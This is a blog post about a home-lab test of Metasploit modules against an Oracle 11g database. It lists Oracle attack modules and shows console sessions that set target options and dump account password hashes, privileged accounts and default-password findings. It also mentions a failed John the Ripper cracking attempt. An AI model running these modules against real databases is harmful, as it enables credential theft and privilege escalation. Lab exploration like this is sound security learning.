Now that I have a Metasploit and Oracle demo environment, it is time to see what I can use to exploit an Oracle 11g Release 2 database. I have to tell you, most of the exploits are actually rather old. I was a bit disappointing.
When you do “search oracle” in Metasploit, you get a promising, long list of scans and exploits. But as you’ll quickly note, a lot is Java related. Because that’s also Oracle. It helps to do a smarter search, for example by looking up oracle in the name: “search name:oracle”. But this also gives you MySQL exploits. And exploits of every old Oracle version. I’m not looking for that now either. And I’ve tried grepping, but that is not interpreted as grepping and gives you really weird results.
So in the end I’m just giving you my list of Oracle database scans and exploits that do not have old version numbers in the description. All non-database products are removed from the list. And for good measure, I’ve also removed exploits with very old disclosure dates, because I assumed they were targeted at versions much older than Oracle 11g.
Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/oracle/ora_ntlm_stealer 2009-04-07 normal Oracle SMB Relay Code Execution auxiliary/admin/oracle/oracle_login 2008-11-20 normal Oracle Account Discovery auxiliary/admin/oracle/oracle_sql 2007-12-07 normal Oracle SQL Generic Query auxiliary/admin/oracle/oraenum normal Oracle Database Enumeration auxiliary/admin/oracle/post_exploitation/win32exec 2007-12-07 normal Oracle Java execCommand (Win32) auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10 normal Oracle URL Download auxiliary/admin/oracle/sid_brute 2009-01-07 normal Oracle TNS Listener SID Brute Forcer auxiliary/admin/oracle/tnscmd 2009-02-01 normal Oracle TNS Listener Command Issuer auxiliary/analyze/jtr_oracle_fast normal John the Ripper Oracle Password Cracker (Fast Mode) auxiliary/scanner/oracle/emc_sid normal Oracle Enterprise Manager Control SID Discovery auxiliary/scanner/oracle/oracle_hashdump normal Oracle Password Hashdump auxiliary/scanner/oracle/oracle_login normal Oracle RDBMS Login Utility auxiliary/scanner/oracle/sid_brute normal Oracle TNS Listener SID Bruteforce auxiliary/scanner/oracle/sid_enum 2009-01-07 normal Oracle TNS Listener SID Enumeration auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal Oracle TNS Listener Service Version Query auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal Oracle TNS Listener Checker auxiliary/scanner/oracle/xdb_sid normal Oracle XML DB SID Discovery auxiliary/scanner/oracle/xdb_sid_brute normal Oracle XML DB SID Discovery via Brute Force auxiliary/sqli/oracle/jvm_os_code_11g 2010-02-01 normal Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution exploit/windows/oracle/client_system_analyzer_upload 2011-01-18 excellent Oracle Database Client System Analyzer Arbitrary File Upload
So that brings me to actually two exploits, and one is actually targetted at the database client (I left it in there, because where there are databases, there often are clients) and one SQL injection hack that – mind you – actually works. If you are a bit of a hacker (or “good with Internet”), it’s not so difficult to get a DBA role with it. Still, bit sobering, isn’t it.
I went through the whole list of scans. Here are few of my experiences.
Password hashes and John the Ripper
I really wanted to try John the Ripper to hack Oracle hashes, but I just did not get it to work. John the Ripper is not running from Metasploit, but installed on Kali Linux 2: its executable is just “john”. And when running john, it assumes you have written a hashdump somewhere that it can use. No problem, there’s a page about John the Ripper hash formats. So I wrote this line in a text file:
Should be compatible, right? Well, apparently not.
root@kali:~# john --format=oracle11 /tmp/orahash.txt Using default input encoding: UTF-8 Loaded 1 password hash (oracle11, Oracle 11g [SHA1 128/128 AVX 4x]) Illegal instruction
An Oracle 10g hash I wrote to a file got the same result. Okay, before I’ll file a bug report, I’ll better try to make a hash dump from my database. See if that will get better results. And maybe I can use that output.
So for that we have auxiliary/scanner/oracle/oracle_hashdump. To run it you need the IP or host of the database server, a SID, and if you’re going to use SCOTT for this, you really need to change the password to lowercase. Also, SCOTT can’t do this exploit by default. You need to give SCOTT the SELECT ANY DICTIONARY privilege. (And this is why you should NEVER give SELECT ANY DICTIONARY privileges: because it gives the user access to your password hashes for one thing.)
msf auxiliary(ora_ntlm_stealer) > use auxiliary/scanner/oracle/oracle_hashdump
The info command is usually more useful than “show options”. Here you see the info after I changed all required values.
msf auxiliary(oracle_hashdump) > info Name: Oracle Password Hashdump Module: auxiliary/scanner/oracle/oracle_hashdump License: Metasploit Framework License (BSD) Rank: Normal Provided by: theLightCosine <theLightCosine@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DBPASS tiger yes The password to authenticate with. DBUSER SCOTT yes The username to authenticate with. RHOSTS 192.168.56.163 yes The target address range or CIDR identifier RPORT 1521 yes The TNS port. SID KNUTSEL yes The sid to authenticate with. THREADS 1 yes The number of concurrent threads Description: This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking.
I ran it and..:
msf auxiliary(oracle_hashdump) > run [*] Server is running 11g, using newer methods... [-] An error occured. The supplied credentials may not have proper privs [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Here is where I got that Han Solo hyperdrive failure feeling. The supported credentials may not have the proper privs? Well if I remove SELECT ANY DICTIONARY I get ORA-00942. That’s what you expect when not having the proper privs:
msf auxiliary(oracle_hashdump) > run [*] Server is running 11g, using newer methods... [*] ORA-00942: table or view does not exist [-] An error occured. The supplied credentials may not have proper privs [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
So I tried to give SCOTT direct select privs on USER$ from SYS. Nope, error. I ran it as SYSTEM. Nope, error. I ran it as SYS… well, actually that wouldn’t work. You have to log in AS SYSDBA, see. So, yeah, this clearly needs a fix. The source code is out there. I’ll see if can find the bug.
Before you throw the Metasploit towel in the ring, let’s have one that I thought was really interesting: auxiliary/admin/oracle/oraenum by Carlos Perez. You need to give a host IP or name, a SID and – again – if you’re going to use SCOTT for this, you really need to change the password to lowercase. Of course SCOTT needs a couple of extra privileges. SELECT ANY DICTIONARY did the trick nicely (so – again – let that be a warning, rather than an encouragement).
msf auxiliary(oraenum) > info Name: Oracle Database Enumeration Module: auxiliary/admin/oracle/oraenum License: Metasploit Framework License (BSD) Rank: Normal Provided by: Carlos Perez <email@example.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DBPASS TIGER yes The password to authenticate with. DBUSER SCOTT yes The username to authenticate with. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. Description: This module provides a simple way to scan an Oracle database server for configuration parameters that may be useful during a penetration test. Valid database credentials must be provided for this module to run. msf auxiliary(oraenum) > set RHOST 192.168.56.163 RHOST => 192.168.56.163 msf auxiliary(oraenum) > set SID KNUTSEL SID => KNUTSEL msf auxiliary(oraenum) > set dbpass tiger dbpass => tiger msf auxiliary(oraenum) > run [*] Running Oracle Enumeration.... [*] The versions of the Components are: [*] Oracle Database 11g Enterprise Edition Release 126.96.36.199.0 - 64bit Production [*] PL/SQL Release 188.8.131.52.0 - Production [*] CORE 184.108.40.206.0 Production [*] TNS for Linux: Version 220.127.116.11.0 - Production [*] NLSRTL Version 18.104.22.168.0 - Production [*] Auditing: [*] Database Auditing is enabled! [*] Auditing of SYS Operations is not enabled! [*] Security Settings: [*] SQL92 Security restriction on SELECT is not Enabled [*] UTL Directory Access is set to [*] Audit log is saved at /u01/app/oracle/admin/KNUTSEL/adump [*] Password Policy: [*] Current Account Lockout Time is set to 1 [*] The Number of Failed Logins before an account is locked is set to 10 [*] The Password Grace Time is set to 7 [*] The Lifetime of Passwords is set to 180 [*] The Number of Times a Password can be reused is set to UNLIMITED [*] The Maximum Number of Times a Password needs to be changed before it can be reused is set to UNLIMITED [*] The Number of Times a Password can be reused is set to UNLIMITED [*] Password Complexity is not checked [*] Active Accounts on the System in format Username,Password,Spare4 are: [*] SYS,03E1E7984F880583,S:3CD57915E74AF162A5ABA3A30FE453E43DF884CB6A552C647B03572BA46D [*] SYSTEM,5A7270D7D12F6BA6,S:EDCB23E4039293C352B12D01EA52F2AF3311B5FA744BE3DCC728BDFE0655 [*] DBSNMP,57E9C5ECCAB1777C,S:D9576CA642448980FB5C04D3869614D572E712BF5E019E02C31BBF300E76 [*] SYSMAN,CB3E68076FBBAFF5,S:1132C132BFA6686735DEC4398F30DD411F0DDCAAAFCB4AC21527887B7129 [*] MGMT_VIEW,23C5225CD5C2C782,S:0983A18B9809980B2ABE7A7A4047E5AA3925DC184C92047B6F5404E8CD11 [*] APP_USER,71B0EFF101D0D5AC,S:13BAA4B46E85969429B3242E64E526292EB15BA071E3AAF37649CD3289BA [*] SCOTT,F894844C34402B67,S:7ED8346E4DA9EE29ACBB4A9D08B2E18B57404E6A9A03DB6AF01024BC0B8F [*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are: [*] OUTLN,4A3BA55E08595C81,S:8DF2965A946AB7ED6F6657A99B91CC792B67BF873D7CAFD3B20C98A28370 [*] DIP,CE4A36B8E06CA59C,S:3E265D395D4D1A637729747CECC8BAD1CD8EFA262A8377E5635BB94434C5 [*] ORACLE_OCM,5A2E026A9157958C,S:CDC4C09C00C4A8C25DCD1062BF8EC8BCB468841A1C77AB6E65188DF24D99 [*] APPQOSSYS,519D632B7EE7F63A,S:B388B593D8609871990A15E991C82ACA154B0ADDA84E7CB549CFCC6E9B94 [*] WMSYS,7C9BA362F8314299,S:A38520037B1C3904B76B3B65E8605DA4F89F710345F60FC7406A3FE9B709 [*] XS$NULL,DC4FCC8CB69A6733,S:0327C110E72AE2E82F08AACBBBD385E4589FA1386F20119E1EE2A6AC8DC4 [*] EXFSYS,33C758A8E388DEE5,S:BA1BB1B61AA7FE91BFF3CA99A116C2299F2DA8F87398D5560C20B74EDD00 [*] XDB,88D8364765FCE6AF,S:7E885EEAC286739730FEDD138F83A361204D96FB92E35FFBDD89A494E32B [*] ANONYMOUS,anonymous, [*] APEX_PUBLIC_USER,E0781A84AA9234A8,S:934C76C08882384A2C51644F9C8302D40D32BFB83524BC4EC9EB84CA0221 [*] ORDSYS,7EFA02EC7EA6B86F,S:74C72073718541C8074E24B1210367A6D702C01064580BFF4E5719AD8ECD [*] ORDDATA,A93EC937FCD1DC2A,S:C7267CE01C7CDCD0AF39C4289B7C66A3E0E75EAA3DC47D6143984256A9F1 [*] ORDPLUGINS,88A2B2C183431F00,S:554026F9CFABC573E6A7B439716F69AF45A33D969FE7C16AA2E8CF702E34 [*] SI_INFORMTN_SCHEMA,84B8CBCA4D477FA3,S:1C2A0B249085C3CEED0B29019231E49F35A56CDB8E0653B1E38E39B5AB8E [*] MDSYS,72979A94BAD2AF80,S:FE9431C8FA6CD61C1741389012B7D7B9ABD4213A612286E83E45F3E50A9E [*] FLOWS_FILES,110F19A4A024EB24,S:EB5CC126B7E3198814CC1B06065AF0E15259706E4036431D15F809527816 [*] APEX_030200,A1A70E91605C5567,S:36A4A6B16BC8D55287D3E672FD86D72EA63C3749640A9DD668122E702F1E [*] Accounts with DBA Privilege in format Username,Hash on the System are: [*] SYS [*] APP_USER [*] SYSTEM [*] Accounts with Alter System Privilege on the System are: [*] SYS [*] DBA [*] APEX_030200 [*] Accounts with JAVA ADMIN Privilege on the System are: [*] Accounts that have CREATE LIBRARY Privilege on the System are: [*] SYS [*] XDB [*] EXFSYS [*] MDSYS [*] DBA [*] Default password check: [*] The account DIP has a default password. [*] The account MDSYS has a default password. [*] The account XS$NULL has a default password. [*] The account OUTLN has a default password. [*] The account EXFSYS has a default password. [*] The account ORACLE_OCM has a default password. [*] The account SCOTT has a default password. [*] The account ORDPLUGINS has a default password. [*] The account ORDSYS has a default password. [*] The account APPQOSSYS has a default password. [*] The account ORDDATA has a default password. [*] The account XDB has a default password. [*] The account SI_INFORMTN_SCHEMA has a default password. [*] The account WMSYS has a default password. [*] Auxiliary module execution completed
Well, that was pretty cool. Password hashes anyone? Default password checks? Checks on auditing. Very nifty.
Next blogpost: TNS poisoning and brute force SID enumerations.